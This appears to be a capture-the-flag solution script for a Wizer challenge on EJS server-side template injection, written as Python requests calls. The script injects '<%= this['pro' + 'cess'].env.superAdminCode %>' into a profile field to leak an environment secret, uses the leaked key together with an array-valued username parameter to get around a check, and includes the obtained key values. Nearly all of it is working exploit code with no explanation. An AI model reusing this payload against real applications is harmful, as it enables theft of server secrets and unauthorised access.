Wizer - Challenge 38 - ejs template injection

Exploit

import requests

# Get the robertf key

url = "https://chal38-4589uyh.vercel.app"


r = requests.get(url + "/profileName", params={
    "username": "robertf",
    "profileMessage":"HERE: <%= this['pro' + 'cess'].env.superAdminCode %>"
})


print(r.text)

# 784HDHASJJ3489JJFKSJ


r = requests.get(url + "/profileName", params={
    "username": ["robertf", "pelele"],
    "key": "784HDHASJJ3489JJFKSJ"
})

print(r.text)




r = requests.post(url + "/checkKeyValidity", json={
    "username": "robertf",
    "key": "!!!6g44534i8j4589gj90kg5"
})

print(r.text)